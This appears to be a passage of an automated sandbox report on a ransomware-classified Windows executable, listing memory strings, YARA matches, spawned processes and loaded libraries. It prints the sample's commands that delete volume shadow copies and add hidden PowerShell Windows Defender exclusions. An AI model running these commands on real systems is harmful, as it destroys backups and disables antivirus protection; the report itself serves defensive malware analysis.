Source: wscript.exe, 00000006.00000003.2161358999.00000000058BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IWshShell3.Run("vssadmin.exe Delete Shadows
Source: wscript.exe, 00000006.00000003.2154850432.00000000058D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exeDelete Shadows /All /Quietv1.0\pow
Source: wscript.exe, 00000006.00000003.2145113348.0000000005778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 00000006.00000003.2145113348.0000000005778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 00000006.00000003.2139492935.000000000574D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'vssadmin.exe Delete Shadows /All /QuietTFv
Source: wscript.exe, 00000006.00000003.2153406857.0000000005779000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 00000006.00000003.2153406857.0000000005779000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 00000006.00000003.2152951863.0000000003247000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IWshShell3.Run("vssadmin.exe Delete Shadows /All /Quiet", "2", "false");
Source: wscript.exe, 00000006.00000003.2153341869.00000000058BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IWshShell3.Run("vssadmin.exe Delete Shadows
Source: wscript.exe, 00000006.00000003.2153090179.0000000002F3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 00000006.00000002.2169444265.00000000058D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exeDelete Shadows /All /Quietv1.0\pow
Source: wscript.exe, 00000006.00000002.2168478256.0000000003246000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IWshShell3.Run("vssadmin.exe Delete Shadows /All /Quiet", "2", "false");
Source: wscript.exe, 00000006.00000003.2153341869.00000000058D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exeDelete Shadows /All /Quietv1.0\pow
Source: wscript.exe, 00000006.00000002.2168478256.000000000324A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IWshShell3.Run("vssadmin.exe Delete Shadows /All /Quiet", "2", "false");
Source: wscript.exe, 00000006.00000003.2139457938.0000000005761000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 00000006.00000003.2139457938.0000000005761000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 00000006.00000003.2145464512.0000000005778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 00000006.00000003.2145464512.0000000005778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 00000006.00000003.2152900820.00000000051F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IWshShell3.Run("vssadmin.exe Delete Shadows /All /Quiet", "2", "false");
Source: wscript.exe, 00000006.00000003.2145307517.0000000005778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 00000006.00000003.2145307517.0000000005778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000A.00000003.2169459026.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000A.00000003.2169459026.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000A.00000003.2168086247.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000A.00000003.2168086247.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000A.00000002.3369609341.0000000002A52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000A.00000003.2162385724.0000000005191000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'vssadmin.exe Delete Shadows /All /Quiet$
Source: wscript.exe, 0000000A.00000003.2169314133.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000A.00000003.2169314133.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000A.00000002.3370693123.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000A.00000002.3370693123.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000A.00000003.2169574248.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000A.00000003.2169574248.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000A.00000003.2160698121.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000A.00000003.2160698121.00000000051BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000B.00000002.3369537830.0000000002F93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000B.00000003.2178316872.00000000058CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'vssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000B.00000003.2178285108.00000000058E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000B.00000003.2178285108.00000000058E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000B.00000003.2179812479.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000B.00000003.2179812479.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000B.00000003.2181209290.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000B.00000003.2181209290.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000B.00000003.2181024068.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000B.00000003.2181024068.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000B.00000002.3370865975.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000B.00000002.3370865975.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}
Source: wscript.exe, 0000000B.00000003.2180896542.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: wscript.exe, 0000000B.00000003.2180896542.00000000058F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: function reset_restore_points(){wscript_shell.Run('vssadmin.exe Delete Shadows /All /Quiet',2,false);}

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_4256.amsi.csv, type: OTHER	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: amsi32_5196.amsi.csv, type: OTHER	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: amsi32_4836.amsi.csv, type: OTHER	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: Process Memory Space: wscript.exe PID: 4256, type: MEMORYSTR	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: Process Memory Space: wscript.exe PID: 5196, type: MEMORYSTR	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
Source: Process Memory Space: wscript.exe PID: 4836, type: MEMORYSTR	Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"	Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BC70B9: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00BC70B9

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BD62E0	0_2_00BD62E0
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BC8458	0_2_00BC8458
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BE0113	0_2_00BE0113
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BEC100	0_2_00BEC100
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BC320E	0_2_00BC320E
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDF3CA	0_2_00BDF3CA
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BD3446	0_2_00BD3446
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BEC5AE	0_2_00BEC5AE
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BCF5FB	0_2_00BCF5FB
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BE0548	0_2_00BE0548
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BCE546	0_2_00BCE546
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BF06A4	0_2_00BF06A4
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BD36C1	0_2_00BD36C1
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BD6715	0_2_00BD6715
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BC277D	0_2_00BC277D
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDF8C6	0_2_00BDF8C6
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BCE9A9	0_2_00BCE9A9
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BD39F2	0_2_00BD39F2
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BD5911	0_2_00BD5911
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BCDB11	0_2_00BCDB11
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BCBB6E	0_2_00BCBB6E
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDFCDE	0_2_00BDFCDE
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BE3D1A	0_2_00BE3D1A
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BD6D4E	0_2_00BD6D4E
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BC5EAB	0_2_00BC5EAB
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BC3FBD	0_2_00BC3FBD
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BCDF48	0_2_00BCDF48
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BE3F49	0_2_00BE3F49

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: String function: 00BDD9C0 appears 51 times
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: String function: 00BDE2F0 appears 31 times
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: String function: 00BDD8C4 appears 38 times

Source: YyVnwn8Zst.exe

Static PE information: invalid certificate

Source: YyVnwn8Zst.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: amsi32_4256.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: amsi32_5196.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: amsi32_4836.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: Process Memory Space: wscript.exe PID: 4256, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: Process Memory Space: wscript.exe PID: 5196, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
Source: Process Memory Space: wscript.exe PID: 4836, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries

Source: classification engine

Classification label: mal100.rans.troj.expl.evad.winEXE@14/25@3/1

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BC6E20 GetLastError,FormatMessageW,

0_2_00BC6E20

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Code function: 0_2_00BD96AD FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00BD96AD

Source: C:\Windows\SysWOW64\wscript.exe

File created: C:\Users\user\AppData\Local\9e146be90.js

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5522265

Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Command line argument: sfxname	0_2_00BDCC0E
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Command line argument: sfxstime	0_2_00BDCC0E
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Command line argument: STARTDLG	0_2_00BDCC0E

Source: YyVnwn8Zst.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process::Create

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

File read: C:\Users\user\Desktop\YyVnwn8Zst.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\YyVnwn8Zst.exe "C:\Users\user\Desktop\YyVnwn8Zst.exe"
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe")
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188
Source: unknown	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe")	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"	Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
